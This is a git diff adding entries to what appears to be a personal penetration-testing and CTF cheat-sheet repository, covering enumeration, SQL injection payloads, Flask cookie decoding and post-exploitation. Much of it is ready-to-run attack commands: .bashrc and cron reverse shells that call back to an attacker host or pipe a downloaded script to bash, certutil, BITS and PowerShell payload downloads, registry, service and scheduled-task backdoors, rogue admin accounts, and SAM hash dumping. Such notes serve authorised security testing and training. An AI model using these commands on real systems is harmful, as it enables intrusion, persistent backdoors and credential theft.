bump

enumeration/docs/ffuf.md

@@ -31,6 +31,10 @@ ffuf -u http://<IP>/sqli-labs/Less-11/ -c -w /usr/share/seclists/Passwords/Leake
 ```sh
 ffuf -u http://FUZZ.test.com -c -w  /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
 ```
+or if the subdomains are listed in the target's host file
+```sh
+ffuf -w /usr/share/seclists/Discovery/DNS/namelist.txt -H "Host: FUZZ.test.com" -u http://<target-IP> -fs 0
+```
 * Fuzz Vhosts & Server Blocks
 ```sh
 ffuf -u http://FUZZ.test.com -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -fs 0

enumeration/docs/nmap.md

@@ -15,3 +15,7 @@ nmap  -oA  nmap-vuln -Pn  -script vuln  -p <Port,Port,Port,...> <IP>
 sudo nmap -oA --nmap-full -sS -sC -sV -p- --defeat-rst-ratelimit <target-IP>
 searchsploit --nmap ./nmap-full.xml --verbose
 ```
+## Wordpress Enumeration
+```sh
+nmap --script http-wordpress-enum --scripts-args check-latest=true,search-limit=1500 -p 80 test.com
+```

exploit/buffer_overflow/docs/pwntools_specifics.md

@@ -0,0 +1,15 @@
+# pwntools
+
+## Memory Addresses of ELF Binary
+* Find address of function and use it on $eip
+```python
+p = process(<binary>)
+elf = ELF(<binary>)
+__function = elf.symbol.<functionName>
+payload = fit({
+    42: __function # Length measured via cyclic 
+})
+p.sendline()
+proc.interactive() 
+```
+

exploit/python/flask_cookie_decode.py

@@ -0,0 +1,36 @@
+import zlib
+import sys
+import json
+from itsdangerous import base64_decode
+
+
+def decode(cookie):
+    """
+    Decode a Flask cookie
+
+    https://www.kirsle.net/wizards/flask-session.cgi
+    """
+    try:
+        compressed = False
+        payload = cookie
+
+        if payload.startswith('.'):
+            compressed = True
+            payload = payload[1:]
+
+        data = payload.split(".")[0]
+
+        data = base64_decode(data)
+        if compressed:
+            data = zlib.decompress(data)
+
+        return data.decode("utf-8")
+    except Exception as e:
+        return f"[Decoding error: are you sure this was a Flask session cookie? {e}]"
+
+
+cookie = sys.argv[1]
+data = decode(cookie)
+json_data = json.loads(data)
+pretty = json.dumps(json_data, sort_keys=True, indent=4, separators=(",", ": "))
+print(pretty)

exploit/sqli/sqli.md

@@ -1,33 +1,43 @@
 # SQL Injection
 
-# Finding an Opportunity
+* [MySQL Comments](https://blog.raw.pm/en/sql-injection-mysql-comment/)
+
+## Finding an Opportunity
 * GET parameter
 ```sh
 http://example.com/index.php?id=' or 1=1 -- -
 ```
+* Sometimes an ID or may come first
+```sh
+http://example.com/index.php?id=10 or 1=1 -- +
+http://example.com/index.php?id=10' or '1'='1'-- -
+http://example.com/index.php?id=-1' or 1=1 -- -&password=x
+```
 * Provoke error to gain information
 ```sh
 http://example.com/index.php?id='
 ```
+* **Incase of client side sanitization craft the URL instead of using the form!!!**
 
-# Usage
-
+## Usage
 * Example, terminate string via `'` and resolve via tautology, comment the rest of the string via `--`
 ```sql
 SELECT * FROM users WHERE username = admin AND password := ' and 1=1 -- -
 SELECT * FROM users WHERE username = admin AND password := ' or 1=1 --+
 ```
 
-* Boolean True and False
+### Boolean True and False
 ```sql
 SELECT * FROM users WHERE username = admin AND password :=1' or 1 < 2 --+
 SELECT * FROM users WHERE username = admin AND password :=1' or 1 > 2 --+
 ```
 
-* Blind injection // Guessing characters
+### Blind injection // Guessing characters
 ```sh
 http://example.com/?id=1' substr((select database()),1,1)) < 105 --+
 ```
+* Function substr(string, start, length)
+* sqlmap via `--level=5 --risk=3 --dbms=sqlite --technique=b --dump` 
 
 ### Union based
 * Check number of cols
@@ -52,6 +62,13 @@ http://example.com/?id=1' substr((select database()),1,1)) < 105 --+
 
 * [OWASP SQLi Docs](https://www.owasp.org/index.php/SQL_Injection)
 
+### Identify Database 
+```sh
+id=sqlite_version()
+id=@@version # mysql/mssql
+id=(SELECT banner FROM v$version) # oracle
+```
+
 #### SQL Functions
 * Use sql functions to fumble the tables & cols via union
 * [source](https://medium.com/@nyomanpradipta120/sql-injection-union-attack-9c10de1a5635)
@@ -59,6 +76,11 @@ http://example.com/?id=1' substr((select database()),1,1)) < 105 --+
 ```sql
 1' and 1=2 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema = database() -- -
 ```
+* sqlite specific
+```sql
+(SELECT sql FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name ='usertable')
+(SELECT group_concat(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%')
+```
 * Extract cols
 ```sh
 1' and 1=2 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_schema = database() and table_name ='user'-- -
@@ -78,6 +100,10 @@ http://example.com/?id=1' substr((select database()),1,1)) < 105 --+
 sqlmap -r request.txt --dbms=mysql --dump
 sqlmap -r request.txt --batch
 ```
+* Select form data automatically
+```sh
+sqlmap -u http://<target-IP>/site.php --forms --dump-all
+```
 
 
 |Parameter|Details|

exploit/web/php/command_injection.md

@@ -0,0 +1,10 @@
+# PHP Command Injection
+Injecting commands to execute code on the server side via php.
+
+## Blind Command Injection
+Attacker does not register a direct response.
+
+### Detect Blind Command Injection
+Try to save output to URI resource like `output.php`
+
+## Active Command Injection

persistence/bashrc.md

@@ -0,0 +1,8 @@
+# Bashrc Bogus
+
+## Add Reverse Shell
+```sh
+echo 'bash -c "bash -i >& /dev/tcp/<attacker-IP>/<attacker-Port> 0>&1"' >> ~/.bashrc
+```
+
+

persistence/crontab.md

@@ -0,0 +1,15 @@
+# Cronjobs
+
+* `crontab -l`
+* `cat /etc/crontab`
+
+## Add Cronjob
+* Add line
+```sh
+* *   * * * root curl http://<attacker-IP>:8000/shell.sh | bash
+``` 
+    * Shell content
+    ```sh
+    bash -c "bash -i >& /dev/tcp/<attacker-IP>/<attacker-Port> 0&1"
+    ```  
+

persistence/persistence.md

@@ -0,0 +1,67 @@
+# Persistence
+
+* Gain through
+    * Startup folder persistence
+    * Editing registry keys
+    * Scheduled tasks
+    * SUID
+    * BITS
+    * Creating a backdoored service
+    * Creat user
+    * RDP
+
+## Gain Persistence on Windows
+* Browser. Add to trusted sites.
+* Powershell
+```sh
+Invoke-WebRequest http://<attacker-IP>:<attackerPort>/shell.exe -OutFile .\shell2.exe
+```
+* DOSprompt
+```cmd
+certutil -urlcache -split -f http://<attacker-IP>:<attacker-Port/shell.exe
+```
+* Use `multi/handler` on attacker and `set PAYLOAD windows/meterpreter/reverse_tcp` 
+### Paths to Persistence
+* Put in startup directory
+```sh
+C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
+```
+* Put the reverse_shell into `%appdata%` and add a registry key
+```sh
+reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v Backdoor /t REG_SZ /d "C:\Users\<USER>\AppData\Roaming\backdoor.exe" 
+```
+### Background Intelligence Transfer Service (BITS)
+```sh
+bitsadmin /create __shell__
+bitsadmin /addfile __shell__ "http://<attacker-IP>:<attacker-Port>/shell2.exe" "C:\Users\<USER>\Documents\shell2.exe"
+```
+```sh
+bitsadmin /SetNotifyCmdLine 1 cmd.exe  "/c shell2.exe /complete __shell__ | start /B C:\Users\<USER>\Documents\shell2.exe"
+bitsadmin /SetMinRetryDelay 30
+bitsadmin /resume
+```
+
+## High Priv 
+* Create user `net user /add <user> <pass>`
+* Add to admin group via `net localgroup Administrator <user> /add` 
+* Check `net localgroup Administrator`
+
+### Add to registry
+* Execute on user logon via
+```sh
+reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /d "Userinit.exe, C:\yadda\shell2.exe" /f
+```
+### Add a Service
+* Inside meterpreter `load powershell` and `powershell_shell`
+```sh
+New-Service -Name "<SERVICE_NAME>" -BinaryPathName "<PATH_TO_BINARY>" -Description "<SERVICE_DESCRIPTION>" -StartupType "Boot"
+```
+### Add Scheduled Task
+```sh
+$A = New-ScheduledTaskAction -Execute "cmd.exe" -Argument "/c C"\Users\Administrator\Documents\rshell.exe
+$B = New-ScheduledTaskTrigger -AtLogOn
+$C = New-ScheduledTaskPrincipal -UserId "NT AUTHORITY/SYSTEM" -RunLevel Highest
+$D = New-ScheduledTaskSettingsSet
+$E = New-ScheduledTask -Action $A -Trigger $B -Principal $C -Settings $D
+Register-ScheduledTask ReverseShell -InputObject $E
+```

pivoting.md

@@ -21,9 +21,10 @@ for i in {1..65535}; do (echo > /dev/tcp/192.168.0.1/$i) >/dev/null 2>&1 && echo
 ## Tools
 ### Enumerating a network using native and statically compiled tools
 ### Proxychains / FoxyProxy
-* Proxychains
+* Proxychains, e.g. scan target via nmap, or connect via nc thorugh jump server
     ```sh
     proxychains nc <IP> <PORT>
+    proychains nmap <IP>
     ```
     * Use `/etc/proxychains.conf` or `./proxychains.conf`containing:
     ```
@@ -32,6 +33,7 @@ for i in {1..65535}; do (echo > /dev/tcp/192.168.0.1/$i) >/dev/null 2>&1 && echo
     # meanwhile
     # defaults set to "tor"
     socks4  127.0.0.1 9050
+    #socks5 127.0.0.1 1337
     # proxy_dns
     ``` 
 * FoxyProxy

post_exploitation/docs/metasploit.md

@@ -26,7 +26,7 @@ use <path/to/exploit>
 ```
 * Fill options like `session` and run the exploit 
 
-### Privilige Escalation on Windows Using Metasploit
+### Privilege Escalation on Windows Using Metasploit
 * Find process with higher privs and migrate to it. Example `spoolsv.exe`.
 ```sh
 migrate -N spoolsv.exe
@@ -38,3 +38,13 @@ help
 creds_all
 ```
 * Enable RDP via `run post/windows/manage/enable_rdp`
+
+### Hashdump on Windows
+* Meterpreter
+```sh
+run post/windows/gather/hashdump
+```
+```sh
+load kiwi
+lsa_dump_sam
+```

post_exploitation/docs/powershell.md

@@ -0,0 +1,8 @@
+# Powershell
+
+## HashDump
+```sh
+save HKLM\SAM C:\Users\Administrator\Desktop\SAM
+save HKLM\SAM C:\Users\Administrator\Desktop\System
+```
+* Use `samdump2`

reverse_shells/docs/msfvenom.md

@@ -37,6 +37,10 @@ or
 ```
 powershell -c "Invoke-WebRequest -Uri 'ip/shell.exe' -OutFile 'C:\Windows\Temp\shell.exe'"
 ```
+or on cmd.exe
+```sh
+certutil -urlcache -split -f http://<attacker-IP>:<attacker-Port>/shell.exe
+```
 
 ## Unix
 ### netcat reverse